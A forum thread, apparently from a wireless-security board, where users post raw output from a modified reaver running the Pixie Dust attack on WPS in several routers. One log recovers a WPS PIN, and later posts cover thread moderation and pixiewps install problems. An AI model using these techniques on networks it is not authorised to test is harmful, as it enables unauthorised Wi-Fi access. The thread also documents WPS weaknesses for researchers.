[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Number: EV-2006-07-27
[P] Access Point Serial Number: 123456789012347
[+] Received M1 message
[P] PKR: 19:fc:9c:fb:93:99:c3:5b:96:d8:d1:71:92:2e:64:89:85:5e:b8:c2:51:cc:f0:3d:e5:87:ef:8a:4d:5b:fd:63:bb:4d:ac:1d:d5:fd:ec:a6:ab:f2:35:80:33:bc:c9:61:4f:f5:6b:51:ce:1c:64:dd:c8:e2:a2:aa:98:5d:b0:8c:fe:90:1f:db:fb:a1:13:ec:55:29:4f:3e:49:3a:80:62:4d:fe:77:9e:6e:78:25:5f:5d:30:8f:34:20:2a:28:82:2f:08:23:af:86:79:29:1c:be:e8:75:af:c8:a7:e9:90:52:2a:15:cd:49:21:c0:00:62:91:3e:1e:94:11:55:92:28:54:81:89:f9:af:99:b8:f4:7a:29:80:0a:92:69:18:63:97:5f:85:73:51:af:9b:63:fb:a3:dc:0e:7d:eb:2b:23:3d:8b:4f:50:e5:eb:9b:bc:7e:d6:2b:21:93:09:52:6b:8a:71:d0:33:31:6c:82:01:f3:ee:85:77:97:2c:ae
[P] AuthKey: 2b:da:97:bc:a7:06:a8:e9:94:6e:ff:f3:70:e3:84:8d:ec:48:ad:b0:ba:49:74:6b:a0:31:93:db:ac:71:9a:09
[+] Sending M2 message
[P] E-Hash1: 88:a0:55:ea:db:12:db:0d:f4:61:91:5c:3f:e7:11:07:6d:5a:1f:57:b2:7e:fc:6e:34:29:3f:2a:de:56:c8:74
[P] E-Hash2: 97:c4:d6:06:29:db:a1:bf:4c:e9:96:c2:ee:6f:dd:e6:df:b6:30:c1:20:68:e5:2e:d2:ef:d6:82:43:38:31:b6
[Pixie-Dust]  
[Pixie-Dust]   [-] WPS pin not found!
[Pixie-Dust]  
[Pixie-Dust][*] Time taken: 2 s
[Pixie-Dust]

http://imgur.com/fnrrZUn

Code:

Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: da:42:7d:5e:4c:b6:a3:98:b5:f3:41:77:42:8e:a6:d8
[P] PKE: c6:bc:d8:bc:9a:be:0e:e3:ef:06:dd:55:bc:07:79:1b:56:32:76:fd:63:b9:b1:84:a6:6a:fe:ec:98:d8:d1:ae:62:fe:23:e1:c1:93:39:81:5a:ff:69:56:32:28:12:3e:2b:de:7a:d6:79:93:0a:b2:3a:fd:35:e2:03:2b:e7:4b:08:fc:81:76:c9:46:1a:8b:96:1a:f3:bf:85:99:f8:fb:d3:b5:91:a9:96:92:ad:fd:90:17:45:a6:34:9a:01:9f:a0:df:4d:a3:d4:0e:38:bc:79:b2:9e:38:c2:7b:5e:8c:97:b9:23:89:6c:91:e1:ae:82:bf:f0:86:06:ff:11:da:30:14:dc:39:28:c6:51:07:05:a3:b0:50:93:5b:50:44:8a:5f:19:e8:a7:2c:86:22:21:b4:2a:11:40:e7:e8:53:e5:0d:7f:b1:90:a2:01:c7:7a:5e:65:2a:cc:13:7d:3b:3c:00:67:00:ee:66:40:93:7e:7d:c9:0b:d8:62:fc:37
[P] WPS Manufacturer: ZyXEL
[P] WPS Model Number: P-660W-T1 v3
[P] Access Point Serial Number: 00000001
[+] Received M1 message
[P] PKR: 80:d4:14:fc:c5:52:20:b5:15:b0:e4:4d:d4:ed:39:aa:aa:04:7c:b5:b4:c7:a7:68:f3:53:5a:d6:1b:40:74:66:45:88:19:ab:32:54:ff:62:c7:73:3e:f8:20:1e:39:7b:98:2e:79:2a:6f:2c:c0:f5:2c:11:af:8b:fc:ed:5b:09:03:bb:05:15:c3:b4:2a:1e:ec:8a:11:ee:ef:45:b0:8f:4d:47:5c:76:ed:8f:01:c5:4f:38:2e:58:25:54:df:af:9a:c7:9e:d4:1f:d5:ae:9b:47:87:7e:91:03:74:62:52:b7:c7:b8:30:27:a5:77:8f:42:f4:1c:d7:8c:40:71:ce:41:ae:c5:92:d4:7f:90:9b:ee:7f:f7:6f:c6:8c:74:c6:8e:aa:50:65:b4:7f:42:ce:e3:76:54:fb:cc:1d:c9:93:2a:96:15:76:4b:86:9a:18:8f:f8:17:48:4f:5c:d6:37:29:be:e1:4e:95:91:4b:21:fa:2c:2c:73:57:88:f4:0b
[P] AuthKey: c5:d7:f1:9d:c1:ae:3a:ff:ba:91:7e:74:e3:22:ab:d2:1c:4e:fe:d8:e4:77:07:76:2a:14:92:e5:e1:67:99:c9
[+] Sending M2 message
[P] E-Hash1: 23:21:cc:28:94:70:12:dc:15:1b:cc:92:55:18:bf:5f:7b:8a:4e:cd:34:a8:2a:21:03:57:ef:3d:a3:4b:4f:9b
[P] E-Hash2: c4:52:d0:f5:c8:46:cf:d4:4d:bd:f1:49:2e:ea:a2:7a:c9:47:d5:4f:5c:de:f2:67:19:74:40:a0:87:0b:e8:cf
[Pixie-Dust]  
[Pixie-Dust]   [-] WPS pin not found!
[Pixie-Dust]  
[Pixie-Dust][*] Time taken: 1 s
[Pixie-Dust]

http://imgur.com/1MrIW4K

Code:

Trying pin 12345670.
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 87:22:86:c8:e7:13:9b:77:7d:08:0b:74:85:2b:c0:e4
[P] PKE: a5:e7:ee:d7:ae:0b:3c:c4:4d:d8:fe:d1:91:b1:a6:88:68:dc:08:af:e7:19:70:7e:b3:4e:56:1b:d7:06:30:6a:92:a6:c2:6a:2f:ad:1d:0b:c0:fb:73:8d:63:5c:33:8a:8d:b0:01:70:c4:e0:c5:6e:fb:33:85:ef:1a:e6:1e:7d:e2:77:70:bc:a0:9a:eb:05:d5:bc:12:ef:d7:9b:96:44:2c:8e:34:b5:57:36:e1:9f:fc:9d:c0:22:de:4d:a0:91:c4:83:d4:39:d3:fb:91:5e:0d:b1:5c:2e:bb:89:c5:d4:c8:69:ad:8a:b3:f3:57:71:ee:37:66:af:5a:a6:ec:c0:13:47:6b:2e:29:88:93:d4:0d:0e:fc:c7:a4:3f:12:53:62:e4:91:8f:60:c3:81:65:c7:9c:eb:33:47:77:7b:da:23:6f:64:e7:f5:3d:09:68:e8:a9:a1:5c:6b:7e:59:e5:06:15:c2:1a:2d:3b:f3:8e:b5:ea:f8:81:f4:74:d9:fc
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Number: 1.0
[P] Access Point Serial Number: 14CC200000*
[+] Received M1 message
[P] PKR: 71:ad:3b:95:65:b4:e3:1e:28:da:2a:d3:98:88:5f:23:4a:07:a1:21:37:45:87:ea:e5:47:01:0a:ba:65:be:7f:52:02:b0:82:3a:b1:f0:ed:17:8f:54:3a:35:a8:8c:65:cc:53:fe:67:23:ea:81:ac:9e:15:48:55:3f:97:bd:29:41:c9:f6:b5:7d:23:b5:3e:63:fc:68:9a:8f:91:e4:a4:ff:2e:9a:12:1c:87:a6:f9:9a:f2:b9:c0:21:a7:61:c4:39:28:1d:1a:5c:e4:66:9d:14:08:9f:2c:0a:e7:c1:f8:54:f5:a8:7e:81:5f:eb:ce:74:09:f8:1d:cb:46:fc:2e:c6:29:f3:c1:93:ba:62:ee:de:54:f4:21:40:55:e8:37:bb:27:52:e7:56:dd:02:09:57:84:4b:f8:78:ed:49:f7:89:7a:23:e3:b3:52:9e:8a:6b:2a:1b:64:b5:77:fd:0b:3e:ba:17:2f:fd:1d:a9:48:d6:39:97:68:4f:fb:28:bc
[P] AuthKey: 10:91:7d:d9:5a:ab:2b:0b:b6:90:db:6e:52:50:ce:c5:8e:3e:6a:91:51:32:50:bc:9a:a1:70:16:29:b9:c9:d0
[+] Sending M2 message
[P] E-Hash1: cd:8e:34:12:12:61:ae:92:9f:ef:fd:7a:88:55:03:3f:5a:52:ad:27:7a:b4:f3:ec:08:1c:07:ab:e9:61:6d:fc
[P] E-Hash2: 6e:a2:a5:cc:2b:94:ff:d9:9e:fd:d2:d3:5a:dd:73:c0:51:40:92:a7:85:3f:cc:ff:40:ab:bf:e1:15:7c:fa:57
[Pixie-Dust]  
[Pixie-Dust]   [-] WPS pin not found!
[Pixie-Dust]  
[Pixie-Dust][*] Time taken: 2 s
[Pixie-Dust]

AND This AP VULNERABLE , pixi sees true values

Code:

Trying pin 12345670.
.............................
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Number: RT2860
[P] Access Point Serial Number: 12345678
[+] Received M1 message
[P] PKR: ................
e:e4:84:ca:d7:97:fb:98:a9:a3:fb:ca:db:5e:d7:4d:04:b9:80
[P] AuthKey: 
[+] Sending M2 message
[P] E-Hash1: 
[P] E-Hash2: 
[Pixie-Dust]  
[Pixie-Dust][*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust][*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust][*] PSK1: 11:95:69:82:fa:31:a9:2b:2e:5d:f3:9d:02:6b:1c:f5
[Pixie-Dust][*] PSK2: 6a:e0:0a:ed:09:16:46:66:f4:ef:88:3d:4c:ed:95:ae
[Pixie-Dust]   [+] WPS pin: 71632285
[Pixie-Dust]  
[Pixie-Dust][*] Time taken: 0 s
[Pixie-Dust]

http://imgur.com/zlmrfjO

I think this is problem so Pixie not vulnerable , Realtek ,brodcom and atheros chipsets ....

I don t know but probably

[kcdtv]

hello
Hold on a second my friend : this thread is to speak about pixie dust attack "theoretically"; not for reporting bugs using modified reaver ( you have another thread for that )

"Pixie sees wrong values."

pixiewps ( you have another thread to speak about it ) does not "see" any value,
Or you enter the value manually, or you use a script or you are using the automated reaver (that is the case )...
I suggest you to post in the correct thread : Reaver modfication for Pixie Dust Attack
cheers

[Saydamination]

hello
Hold on a second my friend : this thread is to speak about pixie dust attack "theoretically"; not for reporting bugs using modified reaver ( you have another thread for that )

pixiewps ( you have another thread to speak about it ) does not "see" any value,
Or you enter the value manually, or you use a script or you are using the automated reaver (that is the case )...
I suggest you to post in the correct thread : Reaver modfication for Pixie Dust Attack
cheers

Thanks @kcdtv ..

I will do it...

[popthattif]

Can someone please tell me how to make reaver delay between sending M1 and M2?

[Frost.Elrick]

Dependencies
[code]
sudo apt-get install libssl-dev
sudo apt-get install libpcap-dev
sudo apt-get install libsqlite3-dev

Couldnt get the libssl-dev its forbidden in repository as kali is unable to update
im running latest live ver. but still can get the package.
pixie is unable to install without ssl.
help me......

[nuroo]

What fixes, improvements will pixiewps 1.1 bring?